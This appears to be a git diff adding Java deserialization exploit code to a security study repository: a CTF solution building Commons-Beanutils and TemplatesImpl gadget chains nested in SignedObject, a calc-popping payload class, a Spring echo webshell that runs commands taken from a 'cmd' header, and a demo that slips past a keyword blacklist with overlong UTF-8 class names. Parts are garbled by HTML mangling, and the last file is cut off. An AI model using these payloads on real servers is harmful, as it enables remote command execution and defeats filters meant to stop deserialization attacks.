diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/EXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/EXP.java"
new file mode 100644
index 00000000..57a2d9ac
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/EXP.java"	
@@ -0,0 +1,71 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Base64;
+import java.util.PriorityQueue;
+
+public class EXP {
+ public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
+ Field field = obj.getClass().getDeclaredField(fieldname);
+ field.setAccessible(true);
+ field.set(obj,value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ byte[] bytes= ClassPool.getDefault().get(Evil.class.getName()).toBytecode();
+
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
+ setFieldValue(obj, "_name", "a");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ PriorityQueue queue1 = getpayload(obj, "outputProperties");
+
+ KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
+ kpg.initialize(1024);
+ KeyPair kp = kpg.generateKeyPair();
+ SignedObject signedObject = new SignedObject(queue1, kp.getPrivate(), Signature.getInstance("DSA"));
+
+ PriorityQueue queue2 = getpayload(signedObject, "object");
+
+ //序列化
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(queue2);
+ oos.close();
+ System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
+ // serialize(queue2);
+//
+// //反序列化
+ // deserialize("ser.bin");
+ }
+
+ public static PriorityQueue getpayload(Object object, String string) throws Exception {
+ BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+ PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
+ priorityQueue.add("1");
+ priorityQueue.add("2");
+ setFieldValue(beanComparator, "property", string);
+ setFieldValue(priorityQueue, "queue", new Object[]{object, null});
+ return priorityQueue;
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object deserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/Evil.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/Evil.java"
new file mode 100644
index 00000000..6db03202
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/Evil.java"	
@@ -0,0 +1,28 @@
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+import java.io.IOException;
+
+// 弹计算器的万能类
+public class Evil extends AbstractTranslet {
+ static {
+ try {
+ Runtime.getRuntime().exec("calc");
+ } catch (IOException e){
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/Memshell.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/Memshell.java"
new file mode 100644
index 00000000..61dbb7d6
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/Memshell.java"	
@@ -0,0 +1,70 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Base64;
+import java.util.PriorityQueue;
+
+public class Memshell {
+ public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
+ Field field = obj.getClass().getDeclaredField(fieldname);
+ field.setAccessible(true);
+ field.set(obj,value);
+ }
+
+ public static void main(String[] args) throws Exception {
+
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{ClassPool.getDefault().get(SpringEcho.class.getName()).toBytecode()});
+ setFieldValue(obj, "_name", "a");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ PriorityQueue queue1 = getpayload(obj, "outputProperties");
+
+ KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
+ kpg.initialize(1024);
+ KeyPair kp = kpg.generateKeyPair();
+ SignedObject signedObject = new SignedObject(queue1, kp.getPrivate(), Signature.getInstance("DSA"));
+
+ PriorityQueue queue2 = getpayload(signedObject, "object");
+
+ //序列化
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(queue2);
+ oos.close();
+ System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
+ // serialize(queue2);
+//
+// //反序列化
+ // deserialize("ser.bin");
+ }
+
+ public static PriorityQueue getpayload(Object object, String string) throws Exception {
+ BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+ PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
+ priorityQueue.add("1");
+ priorityQueue.add("2");
+ setFieldValue(beanComparator, "property", string);
+ setFieldValue(priorityQueue, "queue", new Object[]{object, null});
+ return priorityQueue;
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object deserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/SpringEcho.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/SpringEcho.java"
new file mode 100644
index 00000000..7b76f24d
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/EXP/SpringEcho.java"	
@@ -0,0 +1,45 @@
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+
+import java.io.Serializable;
+import java.lang.reflect.Method;
+import java.util.Scanner;
+
+public class SpringEcho extends AbstractTranslet implements Serializable {
+ public SpringEcho() throws Exception{
+ Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
+ Method m = c.getMethod("getRequestAttributes");
+ Object o = m.invoke(null);
+ c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
+ m = c.getMethod("getResponse");
+ Method m1 = c.getMethod("getRequest");
+ Object resp = m.invoke(o);
+ Object req = m1.invoke(o); // HttpServletRequest
+ Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
+ Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
+ getHeader.setAccessible(true);
+ getWriter.setAccessible(true);
+ Object writer = getWriter.invoke(resp);
+ String cmd = (String)getHeader.invoke(req, "cmd");
+ String[] commands = new String[3];
+ String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+ if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
+ commands[0] = "cmd";
+ commands[1] = "/c";
+ } else {
+ commands[0] = "/bin/sh";
+ commands[1] = "-c";
+ }
+ commands[2] = cmd;
+ writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
+ writer.getClass().getDeclaredMethod("flush").invoke(writer);
+ writer.getClass().getDeclaredMethod("close").invoke(writer);
+ }
+
+ @Override
+ public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws com.sun.org.apache.xalan.internal.xsltc.TransletException {
+ }
+ @Override
+ public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.dtm.DTMAxisIterator iterator, com.sun.org.apache.xml.internal.serializer.SerializationHandler handler) throws com.sun.org.apache.xalan.internal.xsltc.TransletException {
+
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/Ez_Java.jar" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/Ez_Java.jar"
new file mode 100644
index 00000000..36cb4773
Binary files /dev/null and "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 351円271円217円345円237円216円346円235円257円 ez_java/Ez_Java.jar" differ
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/.gitignore" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/.gitignore"
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/.gitignore"
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/pom.xml" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/pom.xml"
new file mode 100644
index 00000000..4ee585be
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/pom.xml"
@@ -0,0 +1,21 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>UTF8Deserialize</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - UTF8Deserialize</name>
+ <url>http://maven.apache.org</url>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>8</source>
+ <target>8</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+</project>
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/ser.bin" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/ser.bin"
new file mode 100644
index 00000000..3c0d7fb1
Binary files /dev/null and "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/ser.bin" differ
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/BypassTest.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/BypassTest.java"
new file mode 100644
index 00000000..ea7e257d
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/BypassTest.java"
@@ -0,0 +1,55 @@
+import org.example.CustomObjectOutputStream;
+import org.example.Evil;
+
+import java.io.*;
+import java.util.Base64;
+
+public class BypassTest {
+ public static void main(String[] args) throws Exception {
+
+ Evil evil = new Evil();
+ String serializedString = serialize(evil);
+ deserialize(serializedString);
+ }
+
+ static boolean protect(String serializedString) {
+ String blacklist = "Evil";
+ if (serializedString.contains(blacklist)) {
+ return false;
+ }
+ return true;
+ }
+
+
+ static String serialize(Object obj) throws IOException {
+
+ ObjectOutputStream oos2 = new CustomObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos2.writeObject(obj);
+
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new CustomObjectOutputStream(baos);
+ oos.writeObject(obj);
+ oos.close();
+ return new String(Base64.getEncoder().encode(baos.toByteArray()));
+ }
+
+
+ static void deserialize(String serializedString) throws Exception {
+
+ byte[] decodedBytes = Base64.getDecoder().decode(serializedString);
+ String str1 = new String(decodedBytes); // 使用默认字符集构造字符串
+ System.out.println("String from byteArray: " + str1);
+ if (!protect(str1)) {
+ System.out.println("黑名单");
+ return;
+ }
+
+ ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(decodedBytes);
+ ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
+
+ Object object = objectInputStream.readObject();
+ System.out.println("反序列化成功:" + object);
+
+ }
+
+}
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/DeserializeTest.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/DeserializeTest.java"
new file mode 100644
index 00000000..3c01c7bf
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/DeserializeTest.java"
@@ -0,0 +1,24 @@
+import org.example.Evil;
+
+import java.io.*;
+
+public class DeserializeTest {
+
+ public static void main(String[] args) throws Exception {
+ Evil evil = new Evil();
+ // serialize(evil);
+ deserialize("ser.bin");
+ }
+
+ static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ static Object deserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/TestByte.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/TestByte.java"
new file mode 100644
index 00000000..f2785fbd
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/TestByte.java"
@@ -0,0 +1,13 @@
+public class TestByte {
+ public static void main(String[] args) {
+ int b1 = 0xc1; // 1100 0001
+ int b2 = 0xaf; // 1010 1111
+ int i = ((b1 & 0x1F) << 6) &#124; (b2 & 0x3F << 0); + System.out.println(i); + System.out.println((char) i); + String hex1 = Integer.toHexString(i); + System.out.println(hex1); + String hex2 = Integer.toHexString(i & 0xFF); + System.out.println(hex2); + } +} diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/org/example/CustomObjectOutputStream.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/org/example/CustomObjectOutputStream.java" new file mode 100644 index 00000000..998bb57c --- /dev/null +++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/org/example/CustomObjectOutputStream.java" @@ -0,0 +1,140 @@ +package org.example; + +import java.io.*; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import java.util.HashMap; + +public class CustomObjectOutputStream extends ObjectOutputStream { + + private static HashMap<character, int[]> map;
+ static {
+ map = new HashMap<strong>();
+ map.put('.', new int[]{0xc0, 0xae});
+ map.put(';', new int[]{0xc0, 0xbb});
+ map.put('$', new int[]{0xc0, 0xa4});
+ map.put('[', new int[]{0xc1, 0x9b});
+ map.put(']', new int[]{0xc1, 0x9d});
+ map.put('a', new int[]{0xc1, 0xa1});
+ map.put('b', new int[]{0xc1, 0xa2});
+ map.put('c', new int[]{0xc1, 0xa3});
+ map.put('d', new int[]{0xc1, 0xa4});
+ map.put('e', new int[]{0xc1, 0xa5});
+ map.put('f', new int[]{0xc1, 0xa6});
+ map.put('g', new int[]{0xc1, 0xa7});
+ map.put('h', new int[]{0xc1, 0xa8});
+ map.put('i', new int[]{0xc1, 0xa9});
+ map.put('j', new int[]{0xc1, 0xaa});
+ map.put('k', new int[]{0xc1, 0xab});
+ map.put('l', new int[]{0xc1, 0xac});
+ map.put('m', new int[]{0xc1, 0xad});
+ map.put('n', new int[]{0xc1, 0xae});
+ map.put('o', new int[]{0xc1, 0xaf}); // 0x6f
+ map.put('p', new int[]{0xc1, 0xb0});
+ map.put('q', new int[]{0xc1, 0xb1});
+ map.put('r', new int[]{0xc1, 0xb2});
+ map.put('s', new int[]{0xc1, 0xb3});
+ map.put('t', new int[]{0xc1, 0xb4});
+ map.put('u', new int[]{0xc1, 0xb5});
+ map.put('v', new int[]{0xc1, 0xb6});
+ map.put('w', new int[]{0xc1, 0xb7});
+ map.put('x', new int[]{0xc1, 0xb8});
+ map.put('y', new int[]{0xc1, 0xb9});
+ map.put('z', new int[]{0xc1, 0xba});
+ map.put('A', new int[]{0xc1, 0x81});
+ map.put('B', new int[]{0xc1, 0x82});
+ map.put('C', new int[]{0xc1, 0x83});
+ map.put('D', new int[]{0xc1, 0x84});
+ map.put('E', new int[]{0xc1, 0x85});
+ map.put('F', new int[]{0xc1, 0x86});
+ map.put('G', new int[]{0xc1, 0x87});
+ map.put('H', new int[]{0xc1, 0x88});
+ map.put('I', new int[]{0xc1, 0x89});
+ map.put('J', new int[]{0xc1, 0x8a});
+ map.put('K', new int[]{0xc1, 0x8b});
+ map.put('L', new int[]{0xc1, 0x8c});
+ map.put('M', new int[]{0xc1, 0x8d});
+ map.put('N', new int[]{0xc1, 0x8e});
+ map.put('O', new int[]{0xc1, 0x8f});
+ map.put('P', new int[]{0xc1, 0x90});
+ map.put('Q', new int[]{0xc1, 0x91});
+ map.put('R', new int[]{0xc1, 0x92});
+ map.put('S', new int[]{0xc1, 0x93});
+ map.put('T', new int[]{0xc1, 0x94});
+ map.put('U', new int[]{0xc1, 0x95});
+ map.put('V', new int[]{0xc1, 0x96});
+ map.put('W', new int[]{0xc1, 0x97});
+ map.put('X', new int[]{0xc1, 0x98});
+ map.put('Y', new int[]{0xc1, 0x99});
+ map.put('Z', new int[]{0xc1, 0x9a});
+ }
+ public CustomObjectOutputStream(OutputStream out) throws IOException {
+ super(out);
+ }
+
+ @Override
+ protected void writeClassDescriptor(ObjectStreamClass desc) throws IOException {
+ String name = desc.getName();
+// writeUTF(desc.getName());
+ writeShort(name.length() * 2);
+ for (int i = 0; i < name.length(); i++) { + char s = name.charAt(i); +// System.out.println(s); + write(map.get(s)[0]); + write(map.get(s)[1]); + } + writeLong(desc.getSerialVersionUID()); + try { + byte flags = 0; + if ((boolean)getFieldValue(desc,"externalizable")) { + flags &#124;= ObjectStreamConstants.SC_EXTERNALIZABLE; + Field protocolField = ObjectOutputStream.class.getDeclaredField("protocol"); + protocolField.setAccessible(true); + int protocol = (int) protocolField.get(this); + if (protocol != ObjectStreamConstants.PROTOCOL_VERSION_1) { + flags &#124;= ObjectStreamConstants.SC_BLOCK_DATA; + } + } else if ((boolean)getFieldValue(desc,"serializable")){ + flags &#124;= ObjectStreamConstants.SC_SERIALIZABLE; + } + if ((boolean)getFieldValue(desc,"hasWriteObjectData")) { + flags &#124;= ObjectStreamConstants.SC_WRITE_METHOD; + } + if ((boolean)getFieldValue(desc,"isEnum") ) { + flags &#124;= ObjectStreamConstants.SC_ENUM; + } + writeByte(flags); + ObjectStreamField[] fields = (ObjectStreamField[]) getFieldValue(desc,"fields"); + writeShort(fields.length); + for (int i = 0; i < fields.length; i++) { + ObjectStreamField f = fields[i]; + writeByte(f.getTypeCode()); + writeUTF(f.getName()); + if (!f.isPrimitive()) { + Method writeTypeString = ObjectOutputStream.class.getDeclaredMethod("writeTypeString",String.class); + writeTypeString.setAccessible(true); + writeTypeString.invoke(this,f.getTypeString()); +// writeTypeString(f.getTypeString()); + } + } + } catch (NoSuchFieldException e) { + throw new RuntimeException(e); + } catch (IllegalAccessException e) { + throw new RuntimeException(e); + } catch (NoSuchMethodException e) { + throw new RuntimeException(e); + } catch (InvocationTargetException e) { + throw new RuntimeException(e); + } + } + + public static Object getFieldValue(Object object, String fieldName) throws NoSuchFieldException, IllegalAccessException { + Class<?> clazz = object.getClass();
+ Field field = clazz.getDeclaredField(fieldName);
+ field.setAccessible(true);
+ Object value = field.get(object);
+
+ return value;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/org/example/Evil.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/org/example/Evil.java"
new file mode 100644
index 00000000..f641de41
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/java/org/example/Evil.java"
@@ -0,0 +1,12 @@
+package org.example;
+
+import java.io.IOException;
+import java.io.Serializable;
+
+public class Evil implements Serializable {
+ private void writeObject(java.io.ObjectOutputStream s)throws java.io.IOException {
+ }
+ private void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {
+ Runtime.getRuntime().exec("Calc");
+ }
+}
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..145a57f0
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>UTF8Deserialize</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..19d0b2b8
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$UTF8Deserialize</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/Trick/345円217円215円345円272円217円345円210円227円345円214円226円347円273円225円WAF/UTF8Deserialize/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/Trick/351円200円232円347円224円250円345円233円236円346円230円276円344円273円243円347円240円201円/Evil.java" "b/JavaSecurity/Trick/351円200円232円347円224円250円345円233円236円346円230円276円344円273円243円347円240円201円/Evil.java"
new file mode 100644
index 00000000..6db03202
--- /dev/null
+++ "b/JavaSecurity/Trick/351円200円232円347円224円250円345円233円236円346円230円276円344円273円243円347円240円201円/Evil.java"
@@ -0,0 +1,28 @@
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+import java.io.IOException;
+
+// 弹计算器的万能类
+public class Evil extends AbstractTranslet {
+ static {
+ try {
+ Runtime.getRuntime().exec("calc");
+ } catch (IOException e){
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
